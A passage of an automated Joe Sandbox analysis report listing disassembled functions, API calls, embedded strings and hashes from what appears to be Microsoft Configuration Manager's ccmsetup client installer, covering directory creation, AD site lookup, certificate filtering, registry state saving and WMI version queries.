                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0060868D
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006086FF
                                                                                          • CreateDirectoryW.KERNEL32(?,?,00000001,00000000,00000000,00000000,?,00000000,00000000,007525B8,000000FF,00000000,?), ref: 00608716
                                                                                          • GetLastError.KERNEL32 ref: 00608720
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00608756
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CreateDirectoryErrorH_prolog3H_prolog3_catch_LastPathServerShare
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$..\path.cpp$CCM::Utility::Filesystem::RecursiveCreatePath$CreateDirectoryW(pszPath, psa)$RecursiveCreatePath(sPath.substr(0, nPos), psa)$nPos != String::npos$pszPath
                                                                                          • API String ID: 1059470568-328628518
                                                                                          • Opcode ID: 306f4f2718edd412ad01531b5c63b55d4e7a72bff6e4920781876651bda8aa70
                                                                                          • Instruction ID: 924385bbec61ea4840cd6e8dc0f413380b7a1c30b69e82857a0826dbd856d7d7
                                                                                          • Opcode Fuzzy Hash: 306f4f2718edd412ad01531b5c63b55d4e7a72bff6e4920781876651bda8aa70
                                                                                          • Instruction Fuzzy Hash: F1510CB09C0344AEDB25EBA48D0AFFF7E65AF16B11F144045F981772C3DAB94A0AC751
                                                                                          Function 005967FC Relevance: 49.3, APIs: 4, Strings: 24, Instructions: 309threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00596806
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                          • GetCommandLineW.KERNEL32 ref: 0059685D
                                                                                            • Part of subcall function 005F53EA: __EH_prolog3_catch_GS.LIBCMT ref: 005F53F1
                                                                                            • Part of subcall function 005F53EA: GetCurrentThreadId.KERNEL32 ref: 005F54B1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00596954
                                                                                            • Part of subcall function 0059BADB: __EH_prolog3_catch.LIBCMT ref: 0059BAE2
                                                                                            • Part of subcall function 0059BADB: StartServiceCtrlDispatcherW.ADVAPI32(ccmsetup,CcmSetup::RunService,00000020,005968AB,00000001,00000000,?,/runservice,00000000), ref: 0059BB1E
                                                                                            • Part of subcall function 0059BADB: GetLastError.KERNEL32 ref: 0059BB28
                                                                                            • Part of subcall function 0059BADB: GetCurrentThreadId.KERNEL32 ref: 0059BB5E
                                                                                            • Part of subcall function 00634534: __EH_prolog3_catch_GS.LIBCMT ref: 0063453B
                                                                                            • Part of subcall function 00634534: GetCurrentThreadId.KERNEL32 ref: 006345E7
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00596C11
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • Logon installation has detected an existing version of the Configuration Manager Client., xrefs: 00596B64
                                                                                          • Detected client version %s from WMI., xrefs: 00596A5B
                                                                                          • No version of the client is currently detected., xrefs: 00596A14
                                                                                          • 4.0.5931.0, xrefs: 00596A91
                                                                                          • DNk, xrefs: 00596A00
                                                                                          • Upgrade from the existing client version '%s'. The minimum version supported to upgrade is '%s'. Client upgrade will continue but , xrefs: 00596B0D
                                                                                          • lVk, xrefs: 00596AF7
                                                                                          • ccmsetup.cpp, xrefs: 00596944
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0059694F
                                                                                          • This operating system or service pack is not supported., xrefs: 005968F5
                                                                                          • CcmSetup::PrepareForRun, xrefs: 00596831
                                                                                          • ccmsetup.cpp, xrefs: 00596C19
                                                                                          • ccmsetup.cpp, xrefs: 0059695C
                                                                                          • Attempting #%d retry. Max %d retries., xrefs: 00596BB6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00596C0C
                                                                                          • @Lk, xrefs: 005969A5
                                                                                          • ParseCommandLine(), xrefs: 0059694A
                                                                                          • /runservice, xrefs: 00596872
                                                                                          • ccmsetup.cpp, xrefs: 00596C01
                                                                                          • SetObjectSecurity( m_sDownloadDir, c_szDownloadDirectorySecurity ), xrefs: 00596C07
                                                                                          • T[k, xrefs: 00596B9C
                                                                                          • SMSPROVISIONINGMODE, xrefs: 0059697D
                                                                                          • Ccmsetup will run as an evaluation., xrefs: 005969B9
                                                                                          • O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY), xrefs: 00596BD5
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch_$CommandCtrlDispatcherErrorH_prolog3H_prolog3_catchLastLineServiceStart
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$/runservice$4.0.5931.0$@Lk$Attempting #%d retry. Max %d retries.$CcmSetup::PrepareForRun$Ccmsetup will run as an evaluation.$DNk$Detected client version %s from WMI.$Logon installation has detected an existing version of the Configuration Manager Client.$No version of the client is currently detected.$O:BAG:BAD:P(A;CIOI;GA;;;BA)(A;CIOI;GA;;;SY)$ParseCommandLine()$SMSPROVISIONINGMODE$SetObjectSecurity( m_sDownloadDir, c_szDownloadDirectorySecurity )$T[k$This operating system or service pack is not supported.$Upgrade from the existing client version '%s'. The minimum version supported to upgrade is '%s'. Client upgrade will continue but $ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$lVk
                                                                                          • API String ID: 356148672-1948820152
                                                                                          • Opcode ID: 7620edfd5d251123318172d5936756e3c26047e47a5fe6d056665503b38af3d1
                                                                                          • Instruction ID: 028cf81441a982d8b12ff7107aa06d9d56b29a28d46f9cafca8d5ce441cbeace
                                                                                          • Opcode Fuzzy Hash: 7620edfd5d251123318172d5936756e3c26047e47a5fe6d056665503b38af3d1
                                                                                          • Instruction Fuzzy Hash: BFC1D1B1D00319EADF24EFA4C95ABEDBFBABF50304F144059E145B7282DB745A88CB61
                                                                                          Function 00586AC2 Relevance: 49.3, APIs: 5, Strings: 23, Instructions: 279threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 00586ACC
                                                                                            • Part of subcall function 005F419F: __EH_prolog3.LIBCMT ref: 005F41A6
                                                                                            • Part of subcall function 005771EF: __EH_prolog3.LIBCMT ref: 005771F6
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00586BB2
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00586CBA
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00586DD1
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00586E2B
                                                                                          Strings
                                                                                          • GetADInstallParams failed with 0x%x, xrefs: 00586EB6
                                                                                          • LSGetAssignedSiteFromAD(sSiteCode), xrefs: 00586BA8
                                                                                          • FromAD: FSP = %s, xrefs: 00586D19
                                                                                          • AUTO, xrefs: 00586B5F
                                                                                          • ccmsetup.cpp, xrefs: 00586E1B
                                                                                          • FromAD: command line = %s, xrefs: 00586D7D
                                                                                          • LSGetClientDeploymentInfoFromAD( sSiteCode, m_sSiteVersion, sCommandLine, sFSP, oSecurityMode ), xrefs: 00586CB0
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00586DCC
                                                                                          • ccmsetup.cpp, xrefs: 00586DD9
                                                                                          • ccmsetup.cpp, xrefs: 00586DC1
                                                                                          • ccmsetup.cpp, xrefs: 00586BBA
                                                                                          • CcmSetup::GetADInstallParams, xrefs: 00586B24
                                                                                          • GetDefaultMPByAD(sSiteCode.c_str()), xrefs: 00586E21
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00586BAD
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00586E26
                                                                                          • Failed to get assigned site from AD. Error 0x%x, xrefs: 00586BEE
                                                                                          • Got site code '%s' from AD., xrefs: 00586C52
                                                                                          • ParseLightCommandLine(sCommandLine), xrefs: 00586DC7
                                                                                          • ccmsetup.cpp, xrefs: 00586CAA
                                                                                          • ccmsetup.cpp, xrefs: 00586CC2
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00586CB5
                                                                                          • ccmsetup.cpp, xrefs: 00586E33
                                                                                          • ccmsetup.cpp, xrefs: 00586BA2
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3$H_prolog3_catch_
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$AUTO$CcmSetup::GetADInstallParams$Failed to get assigned site from AD. Error 0x%x$FromAD: FSP = %s$FromAD: command line = %s$GetADInstallParams failed with 0x%x$GetDefaultMPByAD(sSiteCode.c_str())$Got site code '%s' from AD.$LSGetAssignedSiteFromAD(sSiteCode)$LSGetClientDeploymentInfoFromAD( sSiteCode, m_sSiteVersion, sCommandLine, sFSP, oSecurityMode )$ParseLightCommandLine(sCommandLine)$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp$ccmsetup.cpp
                                                                                          • API String ID: 2734623419-2132489462
                                                                                          • Opcode ID: 18cb0dbbfabdf0d1c7e7df9910c9743a99b5e16ff36991dfc7044a555977ea26
                                                                                          • Instruction ID: 206eb2318700bd5d475868888891f63e98ed7168de87820b7c1716cb0a37494f
                                                                                          • Opcode Fuzzy Hash: 18cb0dbbfabdf0d1c7e7df9910c9743a99b5e16ff36991dfc7044a555977ea26
                                                                                          • Instruction Fuzzy Hash: 33B1AF71D00219AADB20EBA4CC4AFEEBFB9BF55304F148099E909B7281D7745E48CF61
                                                                                          Function 006240CE Relevance: 47.6, APIs: 8, Strings: 19, Instructions: 328encryptionthreadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006240D8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0062419A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006242F4
                                                                                          • CertOpenStore.CRYPT32(00000002,00000000,00000000,00000000,00000000), ref: 00624354
                                                                                          • CertFindChainInStore.CRYPT32(?,00000001,00000006,00000001,00000020,00000000), ref: 00624372
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006243C0
                                                                                          • GetLastError.KERNEL32(00000002,?,0058B3CC,?,?,?,?,?,00938B28,00000001,00000000,00000000,?,00000001,00000000,00000000), ref: 00624420
                                                                                          • CertCloseStore.CRYPT32(?,00000000), ref: 006244B1
                                                                                            • Part of subcall function 00592624: GetCurrentThreadId.KERNEL32 ref: 00592630
                                                                                          Strings
                                                                                          • ..\CcmCert.cpp, xrefs: 0062418A
                                                                                          • ..\CcmCert.cpp, xrefs: 006243CC
                                                                                          • , xrefs: 00624338
                                                                                          • Finding certificate by issuer chain returned error %08X, xrefs: 00624427
                                                                                          • ..\CcmCert.cpp, xrefs: 006242E4
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006242EF
                                                                                          • Completed searching client certificates based on Certificate Issuers, xrefs: 006244DC
                                                                                          • ..\CcmCert.cpp, xrefs: 006243B0
                                                                                          • sCertIssuers.tokenize(c_szCertIssuer_Separator, saIssuers), xrefs: 00624190
                                                                                          • CcmGetEncodedName(saIssuers[issuerIndex], pIssuerNameBlobs[issuerIndex]), xrefs: 006242EA
                                                                                          • ..\CcmCert.cpp, xrefs: 006242FC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00624195
                                                                                          • Begin searching client certificates based on Certificate Issuers, xrefs: 0062414F
                                                                                          • Certificate Issuer %d [%s], xrefs: 006242A6
                                                                                          • No Certificate Issuers specified, xrefs: 00624206
                                                                                          • CcmUtilLib::CcmGetFilteredCertificateStoreByIssuers, xrefs: 0062410C
                                                                                          • ..\CcmCert.cpp, xrefs: 006241A6
                                                                                          • CheckAddCertToStoreByIssuers(pCertChain, hFilteredStore, pIssuerNameBlobs, nIssuers, bCertificatesFound), xrefs: 006243B6
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006243BB
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$CertStore$ChainCloseErrorFindH_prolog3_catchLastOpen
                                                                                          • String ID: $%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$..\CcmCert.cpp$Begin searching client certificates based on Certificate Issuers$CcmGetEncodedName(saIssuers[issuerIndex], pIssuerNameBlobs[issuerIndex])$CcmUtilLib::CcmGetFilteredCertificateStoreByIssuers$Certificate Issuer %d [%s]$CheckAddCertToStoreByIssuers(pCertChain, hFilteredStore, pIssuerNameBlobs, nIssuers, bCertificatesFound)$Completed searching client certificates based on Certificate Issuers$Finding certificate by issuer chain returned error %08X$No Certificate Issuers specified$sCertIssuers.tokenize(c_szCertIssuer_Separator, saIssuers)
                                                                                          • API String ID: 2529924457-1363791551
                                                                                          • Opcode ID: 55b1303129ee4d72e58de6ad2704d83f463409cf7aea64888fcd6faca2e3044c
                                                                                          • Instruction ID: 07a1597d9974474aec33a0078ead4b3de6c9204bf4acf037840125120d3583d5
                                                                                          • Opcode Fuzzy Hash: 55b1303129ee4d72e58de6ad2704d83f463409cf7aea64888fcd6faca2e3044c
                                                                                          • Instruction Fuzzy Hash: 12C192B1900629AEDF11EFA4D849BEEBFBAFF44704F144059F504AB282CBB95A45CF50
                                                                                          Function 005C948C Relevance: 45.6, APIs: 5, Strings: 21, Instructions: 136threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 005C9493
                                                                                            • Part of subcall function 005F663A: __EH_prolog3.LIBCMT ref: 005F6641
                                                                                            • Part of subcall function 005F663A: RegCloseKey.ADVAPI32(00000006,00000004,005FAE53,0000001C,005F9BFF,?), ref: 005F6661
                                                                                            • Part of subcall function 005F7229: __EH_prolog3_catch.LIBCMT ref: 005F7230
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C9512
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C957A
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C95C8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 005C9622
                                                                                          Strings
                                                                                          • LastTopicType, xrefs: 005C9542
                                                                                          • regKey.SetDword( c_szRegValue_LastStateID, uStateID ), xrefs: 005C95BE
                                                                                          • regKey.SetDword( c_szRegValue_LastTopicType, uTopicType ), xrefs: 005C9570
                                                                                          • state.cpp, xrefs: 005C9582
                                                                                          • CDeploymentStateMessage::SaveStateMessageToReg, xrefs: 005C94AF
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005C9575
                                                                                          • state.cpp, xrefs: 005C95D0
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005C95C3
                                                                                          • LastStateID, xrefs: 005C958C
                                                                                          • state.cpp, xrefs: 005C951A
                                                                                          • regKey.SetString( c_szRegValue_LastStateParams, sParams ), xrefs: 005C9618
                                                                                          • state.cpp, xrefs: 005C962A
                                                                                          • state.cpp, xrefs: 005C956A
                                                                                          • Software\Microsoft\CCMSetup, xrefs: 005C94D5
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005C961D
                                                                                          • state.cpp, xrefs: 005C95B8
                                                                                          • state.cpp, xrefs: 005C9612
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 005C950D
                                                                                          • LastStateParams, xrefs: 005C95E6
                                                                                          • regKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess ), xrefs: 005C9508
                                                                                          • state.cpp, xrefs: 005C9502
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentThread$H_prolog3_catch$CloseH_prolog3
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$CDeploymentStateMessage::SaveStateMessageToReg$LastStateID$LastStateParams$LastTopicType$Software\Microsoft\CCMSetup$regKey.Open( (( HKEY ) (ULONG_PTR)((LONG)0x80000002) ), c_szRegKey_Ccmsetup, ulAccess )$regKey.SetDword( c_szRegValue_LastStateID, uStateID )$regKey.SetDword( c_szRegValue_LastTopicType, uTopicType )$regKey.SetString( c_szRegValue_LastStateParams, sParams )$state.cpp$state.cpp$state.cpp$state.cpp$state.cpp$state.cpp$state.cpp$state.cpp
                                                                                          • API String ID: 288237175-1303838387
                                                                                          • Opcode ID: 6b1243ddb7bda9960c9685870fe49d40beb65d5b84cb9cee554cc375c13a61af
                                                                                          • Instruction ID: fa0c7b789b42226908296bc7db4eb400606c03758e30183091bb2c121a088a07
                                                                                          • Opcode Fuzzy Hash: 6b1243ddb7bda9960c9685870fe49d40beb65d5b84cb9cee554cc375c13a61af
                                                                                          • Instruction Fuzzy Hash: 8941D131A8125AEEDB11EBD1CD1EFFE7E66BF52B90F054009FA007B2C1C6659A01C7A0
                                                                                          Function 006492A2 Relevance: 43.9, APIs: 8, Strings: 17, Instructions: 179threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch.LIBCMT ref: 006492A9
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 00649360
                                                                                          • LsaClose.ADVAPI32(?), ref: 00649506
                                                                                          • LsaFreeMemory.ADVAPI32(00000000), ref: 00649514
                                                                                          Strings
                                                                                          • Failed to query policy using LsaQueryInformationPolicy(), xrefs: 00649443
                                                                                          • CCM::LocationServices::LSJoinedToADDomain, xrefs: 006492B9
                                                                                          • Local machine is not a member of an AD domain, xrefs: 0064947D
                                                                                          • ..\lsad.cpp, xrefs: 0064941F
                                                                                          • LSJoinedToADDomain, xrefs: 0064931C
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006493CC
                                                                                          • GetPolicyHandle(&hLsa), xrefs: 00649356
                                                                                          • LsaNtStatusToWinError(ntsResult), xrefs: 006493C7
                                                                                          • ..\lsad.cpp, xrefs: 00649350
                                                                                          • ..\lsad.cpp, xrefs: 006493DD
                                                                                          • Local Machine is joined to an AD domain, xrefs: 006494C8
                                                                                          • ..\lsad.cpp, xrefs: 00649403
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064935B
                                                                                          • (pPolicyInfo != NULL), xrefs: 00649409
                                                                                          • ..\lsad.cpp, xrefs: 006493C1
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 0064940E
                                                                                          • ..\lsad.cpp, xrefs: 00649368
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2049867533.0000000000571000.00000020.00000001.01000000.00000005.sdmp, Offset: 00570000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2049848961.0000000000570000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2049969327.000000000069E000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050209224.000000000092E000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050229179.0000000000930000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050244438.0000000000933000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050265761.0000000000934000.00000008.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050285079.0000000000938000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2050308731.000000000093C000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_570000_UNK_.jbxd
                                                                                          Similarity
                                                                                          • API ID: CloseCurrentFreeH_prolog3_catchMemoryThread
                                                                                          • String ID: %s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$%s, HRESULT=%08lx (%s,%lu)$(pPolicyInfo != NULL)$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$..\lsad.cpp$CCM::LocationServices::LSJoinedToADDomain$Failed to query policy using LsaQueryInformationPolicy()$GetPolicyHandle(&hLsa)$LSJoinedToADDomain$Local Machine is joined to an AD domain$Local machine is not a member of an AD domain$LsaNtStatusToWinError(ntsResult)
                                                                                          • API String ID: 2048777236-2459341423
                                                                                          • Opcode ID: 11305c8d19ec99a99d491058fc9d9904ef41cff09a68d413e2a07d616239d904
                                                                                          • Instruction ID: 2247616b31e6b98ace15f9c48ee17f6d7aee55a2085caf1933f99fd0f188e922
                                                                                          • Opcode Fuzzy Hash: 11305c8d19ec99a99d491058fc9d9904ef41cff09a68d413e2a07d616239d904
                                                                                          • Instruction Fuzzy Hash: 9B51D371D84349AADF11EFA4C80ABEE7EA9BB85714F144059F510E73C2D7B88A05CBA4
                                                                                          Function 006346B2 Relevance: 43.9, APIs: 5, Strings: 20, Instructions: 152threadCOMMON
                                                                                          Download Yara Rule
                                                                                          APIs
                                                                                          • __EH_prolog3_catch_GS.LIBCMT ref: 006346B9
                                                                                            • Part of subcall function 006013B4: __EH_prolog3.LIBCMT ref: 006013BB
                                                                                            • Part of subcall function 0060B178: __EH_prolog3.LIBCMT ref: 0060B17F
                                                                                            • Part of subcall function 005B14FC: __EH_prolog3.LIBCMT ref: 005B1503
                                                                                            • Part of subcall function 00603360: __EH_prolog3_catch_GS.LIBCMT ref: 00603367
                                                                                            • Part of subcall function 00603360: GetCurrentThreadId.KERNEL32 ref: 006033F8
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063474B
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 006347BD
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063480C
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 0063485B
                                                                                          Strings
                                                                                          • select ClientVersion from SMS_Client, xrefs: 00634785
                                                                                          • spNS.Open(L"root\\ccm"), xrefs: 00634741
                                                                                          • ..\smsutil.cpp, xrefs: 006347AD
                                                                                          • spNS.Query(L"select ClientVersion from SMS_Client", &spEnum), xrefs: 006347B3
                                                                                          • root\ccm, xrefs: 00634713
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00634807
                                                                                          • SMS::Utility::GetClientVersionFromWMI, xrefs: 006346EA
                                                                                          • spEnum.Next (&spObj), xrefs: 00634802
                                                                                          • spObj.GetString (L"ClientVersion", sClientVersion), xrefs: 00634851
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 006347B8
                                                                                          • ClientVersion, xrefs: 0063481F
                                                                                          • ..\smsutil.cpp, xrefs: 006347C5
                                                                                          • ..\smsutil.cpp, xrefs: 006347FC
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00634746
                                                                                          • ..\smsutil.cpp, xrefs: 0063473B
                                                                                          • ..\smsutil.cpp, xrefs: 00634863
                                                                                          • ..\smsutil.cpp, xrefs: 00634753
                                                                                          • ..\smsutil.cpp, xrefs: 0063484B
                                                                                          • %s, HRESULT=%08lx (%s,%lu), xrefs: 00634856
                                                                                          • ..\smsutil.cpp, xrefs: 00634814
                                                                                          Memory Dump Source
